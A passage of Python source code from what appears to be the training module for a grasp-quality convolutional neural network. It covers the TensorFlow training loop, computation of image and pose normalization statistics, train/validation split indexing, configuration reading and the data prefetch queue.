step_start = time.time()
if self._angular_bins > 0:
images, poses, labels, masks = self.prefetch_q.get()
_, l, ur_l, lr, predictions, raw_net_output = self.sess.run([apply_grad_op, loss, unregularized_loss, learning_rate, train_predictions, self.train_net_output], feed_dict={drop_rate_in: self.drop_rate, self.input_im_node: images, self.input_pose_node: poses, self.train_labels_node: labels, self.train_pred_mask_node: masks}, options=GeneralConstants.timeout_option)
else:
images, poses, labels = self.prefetch_q.get()
_, l, ur_l, lr, predictions, raw_net_output = self.sess.run([apply_grad_op, loss, unregularized_loss, learning_rate, train_predictions, self.train_net_output], feed_dict={drop_rate_in: self.drop_rate, self.input_im_node: images, self.input_pose_node: poses, self.train_labels_node: labels}, options=GeneralConstants.timeout_option)
step_stop = time.time()
self.logger.info('Step took %.3f sec.' %(step_stop-step_start))
if self.training_mode == TrainingMode.REGRESSION:
self.logger.info('Max ' + str(np.max(predictions)))
self.logger.info('Min ' + str(np.min(predictions)))
elif self.cfg['loss'] != 'weighted_cross_entropy':
if self._angular_bins == 0:
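# recover class probabilities from the raw logits: subtract the per-row max
# before exponentiating for numerical stability, then normalize to a
# two-class softmax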
ex = np.exp(raw_net_output - np.tile(np.max(raw_net_output, axis=1)[:,np.newaxis], [1,2]))
softmax = ex / np.tile(np.sum(ex, axis=1)[:,np.newaxis], [1,2])
self.logger.info('Max ' + str(np.max(softmax[:,1])))
self.logger.info('Min ' + str(np.min(softmax[:,1])))
self.logger.info('Pred nonzero ' + str(np.sum(softmax[:,1] > 0.5)))
self.logger.info('True nonzero ' + str(np.sum(labels)))
else:
sigmoid = 1.0 / (1.0 + np.exp(-raw_net_output))
self.logger.info('Max ' + str(np.max(sigmoid)))
self.logger.info('Min ' + str(np.min(sigmoid)))
self.logger.info('Pred nonzero ' + str(np.sum(sigmoid > 0.5)))
self.logger.info('True nonzero ' + str(np.sum(labels > 0.5)))
if np.isnan(l) or np.any(np.isnan(poses)):
self.logger.error('Encountered NaN in loss or training poses!')
raise Exception
# log output
if step % self.log_frequency == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
self.logger.info('Step %d (epoch %.2f), %.1f ms/step' %
(step, float(step) * self.train_batch_size / self.num_train,
1000 * elapsed_time / self.log_frequency))
self.logger.info('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
if self.progress_dict is not None:
self.progress_dict['epoch'] = round(float(step) * self.train_batch_size / self.num_train, 2)
train_error = l
if self.training_mode == TrainingMode.CLASSIFICATION:
if self._angular_bins > 0:
predictions = predictions[masks.astype(bool)].reshape((-1, 2))
classification_result = BinaryClassificationResult(predictions[:,1], labels)
train_error = classification_result.error_rate
self.logger.info('Minibatch error: %.3f' %(train_error))
self.summary_writer.add_summary(self.sess.run(self.merged_log_summaries, feed_dict={self.minibatch_error_placeholder: train_error, self.minibatch_loss_placeholder: l, self.learning_rate_placeholder: lr}), step)
sys.stdout.flush()
# update the TrainStatsLogger
self.train_stats_logger.update(train_eval_iter=step, train_loss=l, train_error=train_error, total_train_error=None, val_eval_iter=None, val_error=None, learning_rate=lr)
# evaluate model
if step % self.eval_frequency == 0 and step > 0:
if self.cfg['eval_total_train_error']:
train_result = self._error_rate_in_batches(validation_set=False)
self.logger.info('Training error: %.3f' %(train_result.error_rate))
# update the TrainStatsLogger and save
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=train_result.error_rate, total_train_loss=train_result.cross_entropy_loss, val_eval_iter=None, val_error=None, learning_rate=None)
self.train_stats_logger.log()
if self.train_pct < 1.0:
val_result = self._error_rate_in_batches()
self.summary_writer.add_summary(self.sess.run(self.merged_eval_summaries, feed_dict={self.val_error_placeholder: val_result.error_rate}), step)
self.logger.info('Validation error: %.3f' %(val_result.error_rate))
self.logger.info('Validation loss: %.3f' %(val_result.cross_entropy_loss))
sys.stdout.flush()
# update the TrainStatsLogger
if self.train_pct < 1.0:
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, val_loss=val_result.cross_entropy_loss, val_error=val_result.error_rate, learning_rate=None)
else:
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, learning_rate=None)
# save everything!
self.train_stats_logger.log()
# save the model
if step % self.save_frequency == 0 and step > 0:
self.saver.save(self.sess, os.path.join(self.model_dir, 'model_%05d.ckpt' %(step)))
self.saver.save(self.sess, os.path.join(self.model_dir, 'model.ckpt'))
# launch tensorboard only after the first iteration
if not self.tensorboard_has_launched:
self.tensorboard_has_launched = True
self._launch_tensorboard()
# get final errors and flush the stdout pipeline
final_val_result = self._error_rate_in_batches()
self.logger.info('Final validation error: %.3f%%' %final_val_result.error_rate)
self.logger.info('Final validation loss: %.3f' %final_val_result.cross_entropy_loss)
if self.cfg['eval_total_train_error']:
final_train_result = self._error_rate_in_batches(validation_set=False)
self.logger.info('Final training error: {}'.format(final_train_result.error_rate))
self.logger.info('Final training loss: {}'.format(final_train_result.cross_entropy_loss))
sys.stdout.flush()
# update the TrainStatsLogger
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, val_loss=final_val_result.cross_entropy_loss, val_error=final_val_result.error_rate, learning_rate=None)
# log & save everything!
self.train_stats_logger.log()
self.saver.save(self.sess, os.path.join(self.model_dir, 'model.ckpt'))
except Exception as e:
self._cleanup()
raise
self._cleanup()
def _compute_data_metrics(self):
""" Calculate image mean, image std, pose mean, pose std, normalization params """
# subsample tensors (for faster runtime)
random_file_indices = np.random.choice(self.num_tensors,
size=self.num_random_files,
replace=False)
if self.gqcnn.input_depth_mode == InputDepthMode.POSE_STREAM:
# compute image stats
im_mean_filename = os.path.join(self.model_dir, 'im_mean.npy')
im_std_filename = os.path.join(self.model_dir, 'im_std.npy')
if os.path.exists(im_mean_filename) and os.path.exists(im_std_filename):
self.im_mean = np.load(im_mean_filename)
self.im_std = np.load(im_std_filename)
else:
self.im_mean = 0
self.im_std = 0
# compute mean
self.logger.info('Computing image mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_mean += np.sum(im_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_mean = self.im_mean / num_summed
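# im_mean (and im_std below) are scalar per-pixel statistics: num_summed
# counts individual pixels (training datapoints x height x width), not images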
# compute std
self.logger.info('Computing image std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_std += np.sum((im_data[train_indices, ...] - self.im_mean)**2)
self.im_std = np.sqrt(self.im_std / num_summed)
# save
np.save(im_mean_filename, self.im_mean)
np.save(im_std_filename, self.im_std)
# update gqcnn
self.gqcnn.set_im_mean(self.im_mean)
self.gqcnn.set_im_std(self.im_std)
# compute pose stats
pose_mean_filename = os.path.join(self.model_dir, 'pose_mean.npy')
pose_std_filename = os.path.join(self.model_dir, 'pose_std.npy')
if os.path.exists(pose_mean_filename) and os.path.exists(pose_std_filename):
self.pose_mean = np.load(pose_mean_filename)
self.pose_std = np.load(pose_std_filename)
else:
self.pose_mean = np.zeros(self.raw_pose_shape)
self.pose_std = np.zeros(self.raw_pose_shape)
# compute mean
num_summed = 0
self.logger.info('Computing pose mean')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to pose mean estimate' %(k+1, random_file_indices.shape[0]))
pose_data = self.dataset.tensor(self.pose_field_name, i).arr
train_indices = self.train_index_map[i]
if self.gripper_mode == GripperMode.SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]//2,
replace=False)
pose_data[rand_indices, 4] = -pose_data[rand_indices, 4]
elif self.gripper_mode == GripperMode.LEGACY_SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]//2,
replace=False)
pose_data[rand_indices, 3] = -pose_data[rand_indices, 3]
if train_indices.shape[0] > 0:
pose_data = pose_data[train_indices,:]
pose_data = pose_data[np.isfinite(pose_data[:,3]),:]
self.pose_mean += np.sum(pose_data, axis=0)
num_summed += pose_data.shape[0]
self.pose_mean = self.pose_mean / num_summed
# compute std
self.logger.info('Computing pose std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to pose std estimate' %(k+1, random_file_indices.shape[0]))
pose_data = self.dataset.tensor(self.pose_field_name, i).arr
train_indices = self.train_index_map[i]
if self.gripper_mode == GripperMode.SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]//2,
replace=False)
pose_data[rand_indices, 4] = -pose_data[rand_indices, 4]
elif self.gripper_mode == GripperMode.LEGACY_SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]//2,
replace=False)
pose_data[rand_indices, 3] = -pose_data[rand_indices, 3]
if train_indices.shape[0] > 0:
pose_data = pose_data[train_indices,:]
pose_data = pose_data[np.isfinite(pose_data[:,3]),:]
self.pose_std += np.sum((pose_data - self.pose_mean)**2, axis=0)
self.pose_std = np.sqrt(self.pose_std / num_summed)
self.pose_std[self.pose_std==0] = 1.0
# save
self.pose_mean = read_pose_data(self.pose_mean, self.gripper_mode)
self.pose_std = read_pose_data(self.pose_std, self.gripper_mode)
np.save(pose_mean_filename, self.pose_mean)
np.save(pose_std_filename, self.pose_std)
# update gqcnn
self.gqcnn.set_pose_mean(self.pose_mean)
self.gqcnn.set_pose_std(self.pose_std)
# check for invalid values
if np.any(np.isnan(self.pose_mean)) or np.any(np.isnan(self.pose_std)):
self.logger.error('Pose mean or pose std is NaN! Check the input dataset')
sys.exit(1)  # abort: the dataset yielded invalid pose statistics
elif self.gqcnn.input_depth_mode == InputDepthMode.SUB:
# compute (image - depth) stats
im_depth_sub_mean_filename = os.path.join(self.model_dir, 'im_depth_sub_mean.npy')
im_depth_sub_std_filename = os.path.join(self.model_dir, 'im_depth_sub_std.npy')
if os.path.exists(im_depth_sub_mean_filename) and os.path.exists(im_depth_sub_std_filename):
self.im_depth_sub_mean = np.load(im_depth_sub_mean_filename)
self.im_depth_sub_std = np.load(im_depth_sub_std_filename)
else:
self.im_depth_sub_mean = 0
self.im_depth_sub_std = 0
# compute mean
self.logger.info('Computing (image - depth) mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to (image - depth) mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
depth_data = read_pose_data(self.dataset.tensor(self.pose_field_name, i).arr, self.gripper_mode)
sub_data = im_data - np.tile(np.reshape(depth_data, (-1, 1, 1, 1)), (1, im_data.shape[1], im_data.shape[2], 1))
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_depth_sub_mean += np.sum(sub_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_depth_sub_mean = self.im_depth_sub_mean / num_summed
# compute std
self.logger.info('Computing (image - depth) std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to (image - depth) std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
depth_data = read_pose_data(self.dataset.tensor(self.pose_field_name, i).arr, self.gripper_mode)
sub_data = im_data - np.tile(np.reshape(depth_data, (-1, 1, 1, 1)), (1, im_data.shape[1], im_data.shape[2], 1))
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_depth_sub_std += np.sum((sub_data[train_indices, ...] - self.im_depth_sub_mean)**2)
self.im_depth_sub_std = np.sqrt(self.im_depth_sub_std / num_summed)
# save
np.save(im_depth_sub_mean_filename, self.im_depth_sub_mean)
np.save(im_depth_sub_std_filename, self.im_depth_sub_std)
# update gqcnn
self.gqcnn.set_im_depth_sub_mean(self.im_depth_sub_mean)
self.gqcnn.set_im_depth_sub_std(self.im_depth_sub_std)
elif self.gqcnn.input_depth_mode == InputDepthMode.IM_ONLY:
# compute image stats
im_mean_filename = os.path.join(self.model_dir, 'im_mean.npy')
im_std_filename = os.path.join(self.model_dir, 'im_std.npy')
if os.path.exists(im_mean_filename) and os.path.exists(im_std_filename):
self.im_mean = np.load(im_mean_filename)
self.im_std = np.load(im_std_filename)
else:
self.im_mean = 0
self.im_std = 0
# compute mean
self.logger.info('Computing image mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_mean += np.sum(im_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_mean = self.im_mean / num_summed
# compute std
self.logger.info('Computing image std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_std += np.sum((im_data[train_indices, ...] - self.im_mean)**2)
self.im_std = np.sqrt(self.im_std / num_summed)
# save
np.save(im_mean_filename, self.im_mean)
np.save(im_std_filename, self.im_std)
# update gqcnn
self.gqcnn.set_im_mean(self.im_mean)
self.gqcnn.set_im_std(self.im_std)
# compute normalization parameters of the network
pct_pos_train_filename = os.path.join(self.model_dir, 'pct_pos_train.npy')
pct_pos_val_filename = os.path.join(self.model_dir, 'pct_pos_val.npy')
if os.path.exists(pct_pos_train_filename) and os.path.exists(pct_pos_val_filename):
pct_pos_train = np.load(pct_pos_train_filename)
pct_pos_val = np.load(pct_pos_val_filename)
else:
self.logger.info('Computing grasp quality metric stats')
all_train_metrics = None
all_val_metrics = None
# read metrics
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to metric stat estimates' %(k+1, random_file_indices.shape[0]))
metric_data = self.dataset.tensor(self.label_field_name, i).arr
train_indices = self.train_index_map[i]
val_indices = self.val_index_map[i]
if train_indices.shape[0] > 0:
train_metric_data = metric_data[train_indices]
if all_train_metrics is None:
all_train_metrics = train_metric_data
else:
all_train_metrics = np.r_[all_train_metrics, train_metric_data]
if val_indices.shape[0] > 0:
val_metric_data = metric_data[val_indices]
if all_val_metrics is None:
all_val_metrics = val_metric_data
else:
all_val_metrics = np.r_[all_val_metrics, val_metric_data]
# compute train stats
self.min_metric = np.min(all_train_metrics)
self.max_metric = np.max(all_train_metrics)
self.mean_metric = np.mean(all_train_metrics)
self.median_metric = np.median(all_train_metrics)
# save metrics
pct_pos_train = float(np.sum(all_train_metrics > self.metric_thresh)) / all_train_metrics.shape[0]
np.save(pct_pos_train_filename, np.array(pct_pos_train))
if self.train_pct < 1.0:
pct_pos_val = float(np.sum(all_val_metrics > self.metric_thresh)) / all_val_metrics.shape[0]
np.save(pct_pos_val_filename, np.array(pct_pos_val))
self.logger.info('Percent positive in train: ' + str(pct_pos_train))
if self.train_pct < 1.0:
self.logger.info('Percent positive in val: ' + str(pct_pos_val))
if self._angular_bins > 0:
self.logger.info('Calculating angular bin statistics...')
bin_counts = np.zeros((self._angular_bins,))
for m in range(self.num_tensors):
pose_arr = self.dataset.tensor(self.pose_field_name, m).arr
angles = pose_arr[:, 3]
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
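# At this point each angle has been wrapped into roughly [0, _max_angle], so
# integer division by _bin_width below gives a valid bin index. Illustrative
# example (values assumed, not from any config): with _max_angle = pi and 16
# bins (_bin_width = pi/16), a raw angle of -2.0 rad becomes ~0.43 rad here
# and lands in bin 2.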
for i in range(angles.shape[0]):
bin_counts[int(angles[i] // self._bin_width)] += 1
self.logger.info('Bin counts: {}'.format(bin_counts))
def _compute_split_indices(self):
""" Compute train and validation indices for each tensor to speed data accesses """
# read indices
train_indices, val_indices, _ = self.dataset.split(self.split_name)
# loop through tensors, assigning indices to each file
self.train_index_map = {}
for i in range(self.dataset.num_tensors):
self.train_index_map[i] = []
for i in train_indices:
tensor_index = self.dataset.tensor_index(i)
datapoint_indices = self.dataset.datapoint_indices_for_tensor(tensor_index)
lowest = np.min(datapoint_indices)
self.train_index_map[tensor_index].append(i - lowest)
for i, indices in self.train_index_map.items():
self.train_index_map[i] = np.array(indices)
self.val_index_map = {}
for i in range(self.dataset.num_tensors):
self.val_index_map[i] = []
for i in val_indices:
tensor_index = self.dataset.tensor_index(i)
if tensor_index not in self.val_index_map.keys():
self.val_index_map[tensor_index] = []
datapoint_indices = self.dataset.datapoint_indices_for_tensor(tensor_index)
lowest = np.min(datapoint_indices)
self.val_index_map[tensor_index].append(i - lowest)
for i, indices in self.val_index_map.items():
self.val_index_map[i] = np.array(indices)
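# The resulting maps are keyed by tensor (file) index and hold the within-file
# offsets of the datapoints assigned to each split, e.g. (illustrative values)
# train_index_map = {0: np.array([0, 3, 5]), 1: np.array([2, 7]), ...}.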
def _setup_output_dirs(self):
"""Setup output directories."""
self.logger.info('Saving model to: {}'.format(self.model_dir))
# create the summary dir
self.summary_dir = os.path.join(self.model_dir, 'tensorboard_summaries')
if not os.path.exists(self.summary_dir):
os.mkdir(self.summary_dir)
else:
# if the summary directory already exists, clean it out by deleting all files in it
# we don't want tensorboard to get confused with old logs while debugging with the same directory
old_files = os.listdir(self.summary_dir)
for f in old_files:
os.remove(os.path.join(self.summary_dir, f))
# setup filter directory
self.filter_dir = os.path.join(self.model_dir, 'filters')
if not os.path.exists(self.filter_dir):
os.mkdir(self.filter_dir)
def _save_configs(self):
"""Save training configuration."""
# update config for fine-tuning
if self.finetuning:
self.cfg['base_model_dir'] = self.base_model_dir
# save config
out_config_filename = os.path.join(self.model_dir, 'config.json')
tempOrderedDict = collections.OrderedDict()
for key in self.cfg.keys():
tempOrderedDict[key] = self.cfg[key]
with open(out_config_filename, 'w') as outfile:
json.dump(tempOrderedDict,
outfile,
indent=GeneralConstants.JSON_INDENT)
# save training script
this_filename = sys.argv[0]
out_train_filename = os.path.join(self.model_dir, 'training_script.py')
shutil.copyfile(this_filename, out_train_filename)
# save architecture
out_architecture_filename = os.path.join(self.model_dir, 'architecture.json')
json.dump(self.cfg['gqcnn']['architecture'],
open(out_architecture_filename, 'w'),
indent=GeneralConstants.JSON_INDENT)
def _read_training_params(self):
""" Read training parameters from configuration file """
# splits
self.train_pct = self.cfg['train_pct']
self.total_pct = self.cfg['total_pct']
# training sizes
self.train_batch_size = self.cfg['train_batch_size']
self.val_batch_size = self.cfg['val_batch_size']
self.max_files_eval = None
if 'max_files_eval' in self.cfg.keys():
self.max_files_eval = self.cfg['max_files_eval']
# logging
self.num_epochs = self.cfg['num_epochs']
self.eval_frequency = self.cfg['eval_frequency']
self.save_frequency = self.cfg['save_frequency']
self.log_frequency = self.cfg['log_frequency']
# optimization
self.train_l2_regularizer = self.cfg['train_l2_regularizer']
self.base_lr = self.cfg['base_lr']
self.decay_step_multiplier = self.cfg['decay_step_multiplier']
self.decay_rate = self.cfg['decay_rate']
self.momentum_rate = self.cfg['momentum_rate']
self.max_training_examples_per_load = self.cfg['max_training_examples_per_load']
self.drop_rate = self.cfg['drop_rate']
self.max_global_grad_norm = self.cfg['max_global_grad_norm']
self.optimize_base_layers = False
if 'optimize_base_layers' in self.cfg.keys():
self.optimize_base_layers = self.cfg['optimize_base_layers']
# metrics
self.target_metric_name = self.cfg['target_metric_name']
self.metric_thresh = self.cfg['metric_thresh']
self.training_mode = self.cfg['training_mode']
if self.training_mode != TrainingMode.CLASSIFICATION:
raise ValueError('Training mode %s not currently supported!' %(self.training_mode))
# tensorboard
self._tensorboard_port = self.cfg['tensorboard_port']
# preproc
self.preproc_log_frequency = self.cfg['preproc_log_frequency']
self.num_random_files = self.cfg['num_random_files']
self.max_prefetch_q_size = GeneralConstants.MAX_PREFETCH_Q_SIZE
if 'max_prefetch_q_size' in self.cfg.keys():
self.max_prefetch_q_size = self.cfg['max_prefetch_q_size']
self.num_prefetch_q_workers = GeneralConstants.NUM_PREFETCH_Q_WORKERS
if 'num_prefetch_q_workers' in self.cfg.keys():
self.num_prefetch_q_workers = self.cfg['num_prefetch_q_workers']
# re-weighting positives / negatives
self.pos_weight = 0.0
if 'pos_weight' in self.cfg.keys():
self.pos_weight = self.cfg['pos_weight']
self.pos_accept_prob = 1.0
self.neg_accept_prob = 1.0
if self.pos_weight > 1:
self.neg_accept_prob = 1.0 / self.pos_weight
else:
self.pos_accept_prob = self.pos_weight
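# Illustrative values (not from any config): pos_weight = 2.0 keeps every
# positive and accepts each negative with probability 0.5, while
# pos_weight = 0.5 keeps every negative and accepts each positive with
# probability 0.5. The filtering itself happens in _load_and_enqueue and
# only when pos_weight is nonzero.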
if self.train_pct < 0 or self.train_pct > 1:
raise ValueError('Train percentage must be in range [0,1]')
if self.total_pct < 0 or self.total_pct > 1:
raise ValueError('Total percentage must be in range [0,1]')
# normalization
self._norm_inputs = True
if self.gqcnn.input_depth_mode == InputDepthMode.SUB:
self._norm_inputs = False
# angular training
self._angular_bins = self.gqcnn.angular_bins
self._max_angle = self.gqcnn.max_angle
# during angular training, make sure symmetrization in denoising is turned off and also set the angular bin width
if self._angular_bins > 0:
assert not self.cfg['symmetrize'], 'Symmetrization denoising must be turned off during angular training'
self._bin_width = self._max_angle / self._angular_bins
# debugging
self._debug = self.cfg['debug']
self._seed = self.cfg['seed']
if self._debug:
if self.num_prefetch_q_workers > 1:
self.logger.warning('Deterministic execution is not possible with '
'more than one prefetch queue worker even in debug mode.')
self.num_random_files = self.cfg['debug_num_files'] # this reduces initialization time
np.random.seed(self._seed)
random.seed(self._seed)
def _setup_denoising_and_synthetic(self):
""" Setup denoising and synthetic data parameters """
# multiplicative denoising
if self.cfg['multiplicative_denoising']:
self.gamma_shape = self.cfg['gamma_shape']
self.gamma_scale = 1.0 / self.gamma_shape
# gaussian process noise
if self.cfg['gaussian_process_denoising']:
self.gp_rescale_factor = self.cfg['gaussian_process_scaling_factor']
self.gp_sample_height = int(self.im_height / self.gp_rescale_factor)
self.gp_sample_width = int(self.im_width / self.gp_rescale_factor)
self.gp_num_pix = self.gp_sample_height * self.gp_sample_width
self.gp_sigma = self.cfg['gaussian_process_sigma']
def _open_dataset(self):
""" Open the dataset """
# read in filenames of training data (poses, images, labels)
self.dataset = TensorDataset.open(self.dataset_dir)
self.num_datapoints = self.dataset.num_datapoints
self.num_tensors = self.dataset.num_tensors
self.datapoints_per_file = self.dataset.datapoints_per_file
self.num_random_files = min(self.num_tensors, self.num_random_files)
# read split
if not self.dataset.has_split(self.split_name):
self.logger.info('Training split: {} not found in dataset. Creating new split...'.format(self.split_name))
self.dataset.make_split(self.split_name, train_pct=self.train_pct)
else:
self.logger.info('Training split: {} found in dataset.'.format(self.split_name))
self._compute_split_indices()
def _compute_data_params(self):
""" Compute parameters of the dataset """
# image params
self.im_field_name = self.cfg['image_field_name']
self.im_height = self.dataset.config['fields'][self.im_field_name]['height']
self.im_width = self.dataset.config['fields'][self.im_field_name]['width']
self.im_channels = self.dataset.config['fields'][self.im_field_name]['channels']
self.im_center = np.array([float(self.im_height-1)/2, float(self.im_width-1)/2])
# poses
self.pose_field_name = self.cfg['pose_field_name']
self.gripper_mode = self.gqcnn.gripper_mode
self.pose_dim = pose_dim(self.gripper_mode)
self.raw_pose_shape = self.dataset.config['fields'][self.pose_field_name]['height']
# outputs
self.label_field_name = self.target_metric_name
self.num_categories = 2
# compute the number of train and val examples
self.num_train = 0
self.num_val = 0
for train_indices in self.train_index_map.values():
self.num_train += train_indices.shape[0]
for val_indices in self.val_index_map.values():
self.num_val += val_indices.shape[0]
# set params based on the number of training examples (convert epochs to steps)
self.eval_frequency = int(np.ceil(self.eval_frequency * (float(self.num_train) / self.train_batch_size)))
self.save_frequency = int(np.ceil(self.save_frequency * (float(self.num_train) / self.train_batch_size)))
self.decay_step = self.decay_step_multiplier * self.num_train
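# Illustrative arithmetic (numbers assumed): with num_train = 10000,
# train_batch_size = 64 and eval_frequency = 1 epoch, the conversion above
# yields ceil(1 * 10000 / 64) = 157 optimization steps between evaluations.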
def _setup_tensorflow(self):
"""Setup Tensorflow placeholders, session, and queue"""
# set up training label and numpy datatypes
if self.training_mode == TrainingMode.REGRESSION:
train_label_dtype = tf.float32
self.numpy_dtype = np.float32
elif self.training_mode == TrainingMode.CLASSIFICATION:
train_label_dtype = tf.int64
self.numpy_dtype = np.int64
if self.cfg['loss'] == 'weighted_cross_entropy':
train_label_dtype = tf.float32
self.numpy_dtype = np.float32
else:
raise ValueError('Training mode %s not supported' %(self.training_mode))
# set up placeholders
self.train_labels_node = tf.placeholder(train_label_dtype, (self.train_batch_size,))
self.input_im_node = tf.placeholder(tf.float32, (self.train_batch_size, self.im_height, self.im_width, self.im_channels))
self.input_pose_node = tf.placeholder(tf.float32, (self.train_batch_size, self.pose_dim))
if self._angular_bins > 0:
self.train_pred_mask_node = tf.placeholder(tf.int32, (self.train_batch_size, self._angular_bins * 2))
# create data prefetch queue
self.prefetch_q = mp.Queue(self.max_prefetch_q_size)
# get weights
self.weights = self.gqcnn.weights
# open a tf session for the gqcnn object and store it also as the optimizer session
self.sess = self.gqcnn.open_session()
# setup data prefetch queue worker termination event
self.term_event = mp.Event()
self.term_event.clear()
def _setup_summaries(self):
""" Sets up placeholders for summary values and creates summary writer """
# we create placeholders for our python values because summary_scalar expects
# a placeholder, not simply a python value
self.val_error_placeholder = tf.placeholder(tf.float32, [])
self.minibatch_error_placeholder = tf.placeholder(tf.float32, [])
self.minibatch_loss_placeholder = tf.placeholder(tf.float32, [])
self.learning_rate_placeholder = tf.placeholder(tf.float32, [])
# we create summary scalars with tags that allow us to group them together so we can write different batches
# of summaries at different intervals
tf.summary.scalar('val_error', self.val_error_placeholder, collections=["eval_frequency"])
tf.summary.scalar('minibatch_error', self.minibatch_error_placeholder, collections=["log_frequency"])
tf.summary.scalar('minibatch_loss', self.minibatch_loss_placeholder, collections=["log_frequency"])
tf.summary.scalar('learning_rate', self.learning_rate_placeholder, collections=["log_frequency"])
self.merged_eval_summaries = tf.summary.merge_all("eval_frequency")
self.merged_log_summaries = tf.summary.merge_all("log_frequency")
# create a tf summary writer with the specified summary directory
self.summary_writer = tf.summary.FileWriter(self.summary_dir)
# initialize the variables again now that we have added some new ones
with self.sess.as_default():
tf.global_variables_initializer().run()
def _cleanup(self):
self.logger.info('Cleaning and preparing to exit optimization...')
# set termination event for prefetch queue workers
self.logger.info('Terminating prefetch queue workers...')
self.term_event.set()
# flush prefetch queue
#NOTE: this prevents a deadlock with the worker process queue buffers
self._flush_prefetch_queue()
# join prefetch queue worker processes
for p in self.prefetch_q_workers:
p.join()
# close tensorboard if started
if self.tensorboard_has_launched:
self._close_tensorboard()
# close tensorflow session
self.gqcnn.close_session()
# cleanup
for layer_weights in self.weights.values():
del layer_weights
del self.saver
del self.sess
def _flush_prefetch_queue(self):
"""Flush prefetch queue."""
self.logger.info('Flushing prefetch queue...')
for i in range(self.prefetch_q.qsize()):
self.prefetch_q.get()
def _setup(self):
"""Setup for training."""
# initialize data prefetch queue thread exit booleans
self.queue_thread_exited = False
self.forceful_exit = False
# setup output directories
self._setup_output_dirs()
# save training configuration
self._save_configs()
# read training parameters from config file
self._read_training_params()
# setup image and pose data files
self._open_dataset()
# compute data parameters
self._compute_data_params()
# setup denoising and synthetic data parameters
self._setup_denoising_and_synthetic()
# compute means, std's, and normalization metrics
self._compute_data_metrics()
# setup tensorflow session/placeholders/queue
self._setup_tensorflow()
# setup summaries for visualizing metrics in tensorboard
self._setup_summaries()
def _load_and_enqueue(self, seed):
""" Loads and enqueues a batch of images for training """
signal.signal(signal.SIGINT, signal.SIG_IGN) # when the parent process receives a SIGINT, it will itself handle cleaning up child processes
# set the random seed explicitly to prevent all workers from possibly inheriting
# the same seed on process initialization
np.random.seed(seed)
random.seed(seed)
# open dataset
dataset = TensorDataset.open(self.dataset_dir)
while not self.term_event.is_set():
# loop through data
num_queued = 0
start_i = 0
end_i = 0
file_num = 0
queue_start = time.time()
# init buffers
train_images = np.zeros(
[self.train_batch_size, self.im_height, self.im_width, self.im_channels]).astype(np.float32)
train_poses = np.zeros([self.train_batch_size, self.pose_dim]).astype(np.float32)
train_labels = np.zeros(self.train_batch_size).astype(self.numpy_dtype)
if self._angular_bins > 0:
train_pred_mask = np.zeros((self.train_batch_size, self._angular_bins*2), dtype=bool)
while start_i < self.train_batch_size:
# compute num remaining
num_remaining = self.train_batch_size - num_queued
# gen tensor index uniformly at random
file_num = np.random.choice(self.num_tensors, size=1)[0]
read_start = time.time()
train_images_tensor = dataset.tensor(self.im_field_name, file_num)
train_poses_tensor = dataset.tensor(self.pose_field_name, file_num)
train_labels_tensor = dataset.tensor(self.label_field_name, file_num)
read_stop = time.time()
self.logger.debug('Reading data took %.3f sec' %(read_stop - read_start))
